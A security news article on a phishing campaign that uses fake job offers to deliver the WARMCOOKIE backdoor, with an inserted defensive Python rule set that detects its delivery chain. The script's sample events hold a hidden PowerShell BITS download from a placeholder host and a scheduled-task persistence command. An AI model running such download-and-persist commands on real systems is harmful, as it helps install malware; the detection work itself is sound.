Recent Phishing Scheme Unleashes WARMCOOKIE Backdoor Aimed at Job Seekers
Cybersecurity experts have revealed insights about an active phishing operation that utilizes job-related baits to distribute a Windows-driven backdoor known as WARMCOOKIE.
“Initial examinations suggest that WARMCOOKIE acts as a primary gateway tool to survey target networks and introduce supplementary threats,” outlined Daniel Stepanic from Elastic Security Labs in a recent report. “Each version comes with a fixed [command-and-control] IP address and RC4 key.”
The backdoor is equipped with functionalities to identify infected devices, capture screen snapshots, and deploy additional harmful software. The activity is being monitored by the organization under the moniker REF6127.
The attack instances spotted since the end of April involve emails pretending to be from hiring companies such as Hays, Michael Page, and PageGroup, persuading recipients to click on an embedded link for job details.
Recipients who click the link are prompted to complete a CAPTCHA challenge before a file download begins, after which a JavaScript file (“Update_23_04_2024_5689382.js”) is delivered.
“This disguised script initiates PowerShell, triggering the first step to load WARMCOOKIE,” reported Elastic. “The PowerShell script exploits the Background Intelligent Transfer Service (BITS) to fetch WARMCOOKIE.”
A key aspect of the campaign is the use of compromised infrastructure to host the initial phishing URL, which then redirects victims to the actual landing page.
WARMCOOKIE, a Windows DLL, follows a two-stage process: the first stage establishes persistence via a scheduled task, and the second activates the core functions only after a set of checks intended to evade detection has passed.
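The delivery chain described above (a downloaded JavaScript file launching PowerShell, PowerShell pulling the DLL over BITS, then persistence through a scheduled task) can be expressed as a few process-tree detection rules. The following Python is an added example for defenders, not code from Elastic or from the report; the process-creation events, host placeholder, file paths and task names are constructed for illustration, and the exact command lines used in the real campaign are not on the page.

```python
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell cmdlet and legacy CLI that drive BITS downloads.
BITS_RE = re.compile(r"start-bitstransfer|bitsadmin(\.exe)?\s+/transfer", re.I)
SCHTASKS_RE = re.compile(r"schtasks(\.exe)?\s+/create", re.I)

# Constructed process-creation events (parent image, child image, child command
# line); the URL host, paths and task name are placeholders, not real indicators.
SAMPLE_EVENTS = [
    ("explorer.exe", "wscript.exe",
     r'wscript.exe "C:\Users\alice\Downloads\Update_23_04_2024_5689382.js"'),
    ("wscript.exe", "powershell.exe",
     'powershell.exe -w hidden -c "Start-BitsTransfer -Source '
     'http://LOADER-HOST-PLACEHOLDER/payload -Destination $env:ProgramData\\update.dll"'),
    ("rundll32.exe", "schtasks.exe",
     'schtasks.exe /create /sc minute /mo 10 /tn "SysUpdate" '
     '/tr "rundll32.exe C:\\ProgramData\\update.dll"'),
    ("explorer.exe", "powershell.exe", "powershell.exe -NoProfile Get-ChildItem"),
    ("cscript.exe", "powershell.exe", 'powershell.exe -c "Get-Date"'),
]


def classify(event):
    """Return the names of the rules an event trips (empty list if none)."""
    parent, child, cmdline = event
    parent, child = parent.lower(), child.lower()
    hits = []
    # Stage 1: a script host (JS dropper) spawning PowerShell, optionally with BITS.
    if parent in SCRIPT_HOSTS and child in POWERSHELL:
        hits.append("script-host-spawns-powershell")
        if BITS_RE.search(cmdline):
            hits.append("powershell-bits-download")
    # Stage 2: scheduled-task persistence created from PowerShell or rundll32
    # (assumption: interactive schtasks use from explorer/cmd is not flagged here).
    if child == "schtasks.exe" and SCHTASKS_RE.search(cmdline) \
            and parent in POWERSHELL | {"rundll32.exe"}:
        hits.append("scheduled-task-persistence")
    return hits


def severity(hits):
    """Rank: download or persistence rules are high; a bare spawn is medium."""
    if "powershell-bits-download" in hits or "scheduled-task-persistence" in hits:
        return "high"
    return "medium" if hits else None


def scan(events):
    """Return (command line, rule hits, severity) for every event that matched."""
    results = []
    for event in events:
        hits = classify(event)
        if hits:
            results.append((event[2], hits, severity(hits)))
    return results
```

Running `scan(SAMPLE_EVENTS)` flags the BITS download and the scheduled task as high and the bare cscript-to-PowerShell spawn as medium, while the interactive PowerShell session and the wscript launch itself produce no alert.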
The backdoor is engineered to gather data about the infected machine, in a manner similar to a component used in a prior operation codenamed Resident that targeted manufacturing, commercial, and healthcare entities.
Furthermore, it supports commands for reading from and writing to files, executing commands via cmd.exe, retrieving the list of installed applications, and capturing screenshots.
“WARMCOOKIE is a newly identified backdoor that is gaining traction and is being utilized in campaigns aimed at users globally,” outlined Elastic.
“The functionality provided is fairly basic, beneficial for threat groups in need of a lightweight backdoor to monitor victims and distribute more harmful payloads including ransomware.”
The disclosure coincides with Trustwave SpiderLabs uncovering an elaborate phishing scheme that utilizes fake invoices and exploits the Windows search functionality embedded in HTML code to dispense malware.
The fraudulent emails include a ZIP archive containing an HTML file that uses the legacy Windows “search:” URI protocol handler to display a Shortcut (LNK) file hosted on an external server inside Windows Explorer, creating the illusion of a local search result.
“This LNK file points to a batch script (BAT) hosted on the same server, which, upon user click, could potentially activate more harmful operations,” noted Trustwave, mentioning the failure to retrieve the batch script due to unresponsiveness from the server.
It’s worth noting that the abuse of the search-ms: and search: URI handlers as a malware distribution vector was detailed by Trellix in July 2023.
“While this attack doesn’t involve automatic malware installation, it does require user interaction with various prompts and clicks,” the company mentioned. “However, this technique cleverly masks the attacker’s true purpose, leveraging the user’s trust in familiar interfaces and common actions like opening email attachments.”